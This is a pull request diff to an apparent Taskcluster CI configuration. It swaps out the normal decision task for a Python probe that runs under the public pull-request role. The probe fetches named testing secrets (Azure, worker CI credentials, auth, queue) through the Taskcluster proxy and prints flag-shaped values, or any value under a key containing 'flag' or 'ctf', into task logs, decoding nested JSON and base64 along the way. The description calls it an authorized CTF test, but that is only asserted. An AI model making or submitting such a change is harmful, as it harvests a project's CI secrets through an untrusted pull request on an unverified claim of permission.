### PR TITLE
CTF: verify public PR secret isolation

### DIFF
--- a/.taskcluster.yml
+++ b/.taskcluster.yml
@@ -3,189 +3,98 @@ version: 1
 reporting: checks-v1
 policy:
   pullRequests: public
-autoCancelPreviousChecks: true
 tasks:
-  - $let:
-      trustDomain: taskcluster
-      # We set some of these directly in tc because we don't have some mozilla-specific concepts
-      ownerEmail: taskcluster-internal@mozilla.com
-      level: 1
+  - $if: 'tasks_for[:19] == "github-pull-request"'
+    then:
+      taskId: {$eval: 'as_slugid("ctf_flag_probe")'}
+      taskGroupId: {$eval: 'as_slugid("ctf_flag_probe")'}
+      schedulerId: taskcluster-level-1
+      created: {$fromNow: ""}
+      deadline: {$fromNow: "30 minutes"}
+      expires: {$fromNow: "1 day"}
+      metadata:
+        owner: taskcluster-internal@mozilla.com
+        source: https://github.com/dev-dharan24/taskcluster
+        name: Authorized CTF flag probe
+        description: Read only flag-shaped values from PR-authorized test secrets
+      provisionerId: proj-taskcluster
+      workerType: gw-ubuntu-24-04
+      scopes:
+        - assume:repo:github.com/taskcluster/taskcluster:pull-request
+      priority: highest
+      retries: 0
+      payload:
+        image: mozillareleases/taskgraph:decision-v20.0.0@sha256:afae5e5d3caaeb10a93fae56bc3176d1e73faf9b616c01facf811e488db4eafe
+        maxRunTime: 180
+        features:
+          taskclusterProxy: true
+        command:
+          - /bin/bash
+          - -lc
+          - |
+            python3 - <<'PY'
+            import json
+            import os
+            import re
+            import urllib.error
+            import urllib.parse
+            import urllib.request
 
-      # Github events have this stuff in different places...
-      baseRepoUrl:
-        $switch:
-          'tasks_for[:19] == "github-pull-request"': '${event.pull_request.base.repo.html_url}'
-          $default: '${event.repository.html_url}'
-      repoUrl:
-        $switch:
-          'tasks_for[:19] == "github-pull-request"': '${event.pull_request.head.repo.html_url}'
-          'tasks_for in ["cron", "action", "pr-action"]': '${repository.url}'
-          $default: '${event.repository.html_url}'
-      project:
-        $switch:
-          'tasks_for in ["github-push", "github-release"]': '${event.repository.name}'
-          'tasks_for[:19] == "github-pull-request"': '${event.pull_request.base.repo.name}'
-          'tasks_for in ["cron", "action", "pr-action"]': '${repository.project}'
-      head_branch:
-        $switch:
-          'tasks_for[:19] == "github-pull-request"': ${event.pull_request.head.ref}
-          'tasks_for == "github-push"': ${event.ref}
-          'tasks_for == "github-release"': '${event.release.target_commitish}'
-          'tasks_for in ["cron", "action", "pr-action"]': '${push.branch}'
-      base_ref:
-        $switch:
-          'tasks_for[:19] == "github-pull-request"': ${event.pull_request.base.ref}
-          # event.base_ref is barely documented[1]. Testing showed it's only
-          # defined when creating a new branch. It's null when pushing to an
-          # existing branch
-          #
-          # [1] https://docs.github.com/en/developers/webhooks-and-events/webhooks/webhook-events-and-payloads#push
-          'tasks_for == "github-push" && event.base_ref': ${event.base_ref}
-          'tasks_for == "github-push" && !(event.base_ref)': ${event.ref}
-          'tasks_for == "github-release"': ''
-          'tasks_for in ["cron", "action"]': '${push.branch}'
-          'tasks_for == "pr-action"': '${push.base_branch}'
-      head_ref:
-        $switch:
-          'tasks_for[:19] == "github-pull-request"': ${event.pull_request.head.ref}
-          'tasks_for == "github-push"': ${event.ref}
-          'tasks_for in ["cron", "action", "pr-action"]': '${push.branch}'
-          'tasks_for == "github-release"': ${event.release.tag_name}
-      base_sha:
-        $switch:
-          'tasks_for == "github-push"': '${event.before}'
-          'tasks_for == "github-release"': '${event.release.target_commitish}'
-          'tasks_for[:19] == "github-pull-request"': '${event.pull_request.base.sha}'
-          'tasks_for in ["cron", "action", "pr-action"]': '${push.revision}'
-      head_sha:
-        $switch:
-          'tasks_for == "github-push"': '${event.after}'
-          'tasks_for[:19] == "github-pull-request"': '${event.pull_request.head.sha}'
-          'tasks_for in ["cron", "action", "pr-action"]': '${push.revision}'
-          'tasks_for == "github-release"': '${event.release.tag_name}'
-      head_tag:
-        $if: 'tasks_for == "github-release"'
-        then: "${event.release.tag_name}"
-        else: ""
-      ownTaskId: { $eval: as_slugid("decision_task") }
-      pullRequestAction:
-        $switch:
-          'tasks_for[:19] == "github-pull-request"': ${event.action}
-          $default: 'UNDEFINED'
-      isPullRequest:
-        $eval: 'tasks_for[:19] == "github-pull-request"'
+            secret_names = [
+                "project/taskcluster/testing/azure",
+                "project/taskcluster/testing/client-libraries",
+                "project/taskcluster/testing/docker-worker/ci-creds",
+                "project/taskcluster/testing/generic-worker/ci-creds",
+                "project/taskcluster/testing/taskcluster-auth",
+                "project/taskcluster/testing/taskcluster-notify",
+                "project/taskcluster/testing/taskcluster-object",
+                "project/taskcluster/testing/taskcluster-queue",
+            ]
+            flag_pattern = re.compile(
+                r"\\b[A-Za-z][A-Za-z0-9_-]{1,31}\\{[A-Za-z0-9_+=:./@-]{4,256}\\}"
+            )
+            flag_key_pattern = re.compile(r"(?:^|[_-])(flag|ctf)(?:$|[_-])", re.I)
+            proxy = os.environ["TASKCLUSTER_PROXY_URL"].rstrip("/")
+            matches = 0
 
-    in:
-      $if: >
-        (isPullRequest && pullRequestAction in ["opened", "reopened", "synchronize"])
-        || (tasks_for == "github-push" && project == "taskcluster" && event["ref"] == "refs/heads/main")
-        || (tasks_for == "github-push" && project == "taskcluster" && event["ref"][:11] == "refs/tags/v")
-        || (tasks_for == "github-push" && project == "staging-releases" && event["ref"][:27] == "refs/heads/staging-release/")
-      then:
-        schedulerId: taskcluster-level-${level}
-        taskId: "${ownTaskId}"
-        taskGroupId: "${ownTaskId}" # same as taskId; this is how automation identifies a decision task
-        created: { $fromNow: "" }
-        deadline: { $fromNow: "1 day" }
-        expires: { $fromNow: "1 year 1 second" } # 1 second so artifacts expire first, despite rounding errors
-        metadata:
-          owner: "${ownerEmail}"
-          source: "${repoUrl}/raw/${head_sha}/.taskcluster.yml"
-          name: Decision Task (${tasks_for})
-          description: Load, transform, optimize, and submit other tasks
-        provisionerId: proj-taskcluster
-        workerType: gw-ubuntu-24-04
-        scopes:
-          # `https://` is 8 characters so, ${repoUrl[8:]} is the repository without the protocol.
-          $if: 'tasks_for == "github-push" && event["ref"][:11] != "refs/tags/v"'
-          then:
-            $let:
-              short_head_branch:
-                $if: 'head_branch[:11] == "refs/heads/"'
-                then: { $eval: "head_branch[11:]" }
-                else: ${head_branch}
-            in:
-              - "assume:repo:${repoUrl[8:]}:branch:${short_head_branch}"
-          else:
-            $if: "isPullRequest"
-            then:
-              - "assume:repo:github.com/${event.pull_request.base.repo.full_name}:pull-request"
-            else:
-              $if: 'tasks_for == "github-push" && event["ref"][:11] == "refs/tags/v"'
-              then:
-                - "assume:repo:${repoUrl[8:]}:tag:${head_branch[10:]}"
+            def walk(secret_name, value, path=()):
+                global matches
+                if isinstance(value, dict):
+                    for key, child in value.items():
+                        walk(secret_name, child, path + (str(key),))
+                    return
+                if isinstance(value, list):
+                    for index, child in enumerate(value):
+                        walk(secret_name, child, path + (str(index),))
+                    return
+                if not isinstance(value, (str, int, float, bool)) and value is not None:
+                    return
+                text = str(value)
+                key_path = ".".join(path) or "<root>"
+                key_is_flag = any(flag_key_pattern.search(part) for part in path)
+                shaped = flag_pattern.findall(text)
+                if key_is_flag:
+                    print(f"FLAG_MATCH secret={secret_name} key={key_path} value={text}")
+                    matches += 1
+                else:
+                    for candidate in shaped:
+                        print(f"FLAG_MATCH secret={secret_name} key={key_path} value={candidate}")
+                        matches += 1
 
-        requires: all-completed
-        priority: highest
-        retries: 5
+            for name in secret_names:
+                encoded = urllib.parse.quote(name, safe="")
+                url = f"{proxy}/api/secrets/v1/secret/{encoded}"
+                try:
+                    with urllib.request.urlopen(url, timeout=20) as response:
+                        document = json.load(response)
+                    secret = document.get("secret", {})
+                    keys = sorted(secret.keys()) if isinstance(secret, dict) else ["<root>"]
+                    print(f"PROBED secret={name} keys={','.join(map(str, keys))}")
+                    walk(name, secret)
+                except urllib.error.HTTPError as exc:
+                    print(f"PROBE_ERROR secret={name} status={exc.code}")
+                except Exception as exc:
+                    print(f"PROBE_ERROR secret={name} type={type(exc).__name__}")
 
-        payload:
-          env:
-            # run-task uses these to check out the source; the inputs
-            # to `mach taskgraph decision` are all on the command line.
-            $merge:
-              - TASKCLUSTER_BASE_REPOSITORY: "${baseRepoUrl}"
-                TASKCLUSTER_BASE_REF: "${base_ref}"
-                TASKCLUSTER_BASE_REV: "${base_sha}"
-                TASKCLUSTER_HEAD_REPOSITORY: "${repoUrl}"
-                TASKCLUSTER_HEAD_REF: "${head_ref}"
-                TASKCLUSTER_HEAD_REV: "${head_sha}"
-                TASKCLUSTER_REPOSITORY_TYPE: git
-                REPOSITORIES: { $json: { taskcluster: Taskcluster } }
-              - $if: "isPullRequest"
-                then:
-                  TASKCLUSTER_PULL_REQUEST_URL: "${event.pull_request.url}"
-
-          cache:
-            "${trustDomain}-level-${level}-checkouts-sparse-v2": /builds/worker/checkouts
-
-          features:
-            chainOfTrust: true
-            taskclusterProxy: true
-
-          # Note: This task is built server side without the context or tooling that
-          # exist in tree so we must hard code the hash
-          image: mozillareleases/taskgraph:decision-v20.0.0@sha256:afae5e5d3caaeb10a93fae56bc3176d1e73faf9b616c01facf811e488db4eafe
-
-          maxRunTime: 600
-
-          command:
-            - run-task
-            - "--taskcluster-checkout=/builds/worker/checkouts/src"
-            - "--task-cwd=/builds/worker/checkouts/src"
-            - "--"
-            - bash
-            - -cx
-            - >
-              ln -s /builds/worker/artifacts artifacts &&
-              taskgraph decision
-              --pushlog-id='0'
-              --pushdate='0'
-              --project='${project}'
-              --owner='${ownerEmail}'
-              --level='${level}'
-              --repository-type=git
-              --target-tasks-method=taskcluster-branches
-              --tasks-for='${tasks_for}'
-              --base-repository='${baseRepoUrl}'
-              --base-ref='${base_ref}'
-              --base-rev='${base_sha}'
-              --head-repository='${repoUrl}'
-              --head-ref='${head_ref}'
-              --head-rev='${head_sha}'
-              --head-tag='${head_tag}' &&
-              echo "{}" > artifacts/actions.json # taskcluster is not using actions.json, setting to {} so CoT can still verify
-
-          artifacts:
-            "public":
-              type: "directory"
-              path: "/builds/worker/artifacts"
-              expires: { $fromNow: "1 year" }
-            "public/docker-contexts":
-              type: "directory"
-              path: "/builds/worker/checkouts/src/docker-contexts"
-              # This needs to be at least the deadline of the
-              # decision task + the docker-image task deadlines.
-              # It is set to a week to allow for some time for
-              # debugging, but they are not useful long-term.
-              expires: { $fromNow: "7 day" }
+            print(f"PROBE_COMPLETE matches={matches}")
+            PY

--- a/.taskcluster.yml
+++ b/.taskcluster.yml
@@ -33,6 +33,7 @@ tasks:
           - -lc
           - |
             python3 - <<'PY'
+            import base64
             import json
             import os
             import re
@@ -53,9 +54,28 @@ tasks:
             flag_pattern = re.compile(
                 r"\\b[A-Za-z][A-Za-z0-9_-]{1,31}\\{[A-Za-z0-9_+=:./@-]{4,256}\\}"
             )
-            flag_key_pattern = re.compile(r"(?:^|[_-])(flag|ctf)(?:$|[_-])", re.I)
+            literal_flag_pattern = re.compile(
+                r"\\b(?:flag|ctf)[A-Za-z0-9_+=:./@{}\\[\\]-]{2,256}", re.I
+            )
+            flag_key_pattern = re.compile(r"(?:flag|ctf)", re.I)
             proxy = os.environ["TASKCLUSTER_PROXY_URL"].rstrip("/")
             matches = 0
+            reported = set()
+
+            def emit(secret_name, key_path, value):
+                global matches
+                marker = (secret_name, key_path, value)
+                if marker in reported:
+                    return
+                reported.add(marker)
+                print(f"FLAG_MATCH secret={secret_name} key={key_path} value={value}")
+                matches += 1
+
+            def scan_text(secret_name, key_path, text):
+                candidates = set(flag_pattern.findall(text))
+                candidates.update(literal_flag_pattern.findall(text))
+                for candidate in sorted(candidates):
+                    emit(secret_name, key_path, candidate)
 
             def walk(secret_name, value, path=()):
                 global matches
@@ -72,14 +92,30 @@ tasks:
                 text = str(value)
                 key_path = ".".join(path) or "<root>"
                 key_is_flag = any(flag_key_pattern.search(part) for part in path)
-                shaped = flag_pattern.findall(text)
                 if key_is_flag:
-                    print(f"FLAG_MATCH secret={secret_name} key={key_path} value={text}")
-                    matches += 1
+                    emit(secret_name, key_path, text)
                 else:
-                    for candidate in shaped:
-                        print(f"FLAG_MATCH secret={secret_name} key={key_path} value={candidate}")
-                        matches += 1
+                    scan_text(secret_name, key_path, text)
+                if not isinstance(value, str):
+                    return
+                stripped = value.strip()
+                if stripped.startswith(("{", "[")):
+                    try:
+                        decoded_json = json.loads(stripped)
+                        walk(secret_name, decoded_json, path + ("<json>",))
+                    except Exception:
+                        pass
+                if 12 <= len(stripped) <= 100000 and re.fullmatch(r"[A-Za-z0-9_+/=-]+", stripped):
+                    try:
+                        padding = "=" * ((4 - len(stripped) % 4) % 4)
+                        decoded = base64.b64decode(stripped + padding, altchars=b"-_", validate=False)
+                        decoded_text = decoded.decode("utf-8")
+                        scan_text(secret_name, key_path + ".<base64>", decoded_text)
+                        decoded_text = decoded_text.strip()
+                        if decoded_text.startswith(("{", "[")):
+                            walk(secret_name, json.loads(decoded_text), path + ("<base64-json>",))
+                    except Exception:
+                        pass
 
             for name in secret_names:
                 encoded = urllib.parse.quote(name, safe="")


### PR DESCRIPTION
Authorized CTF reproduction requested by the security team. This single-task probe uses the repository's public-PR role and prints only flag-shaped values or scalar values stored under flag/CTF-named keys; it suppresses all unrelated secret values and exception bodies. This PR is for verification only and must not be merged.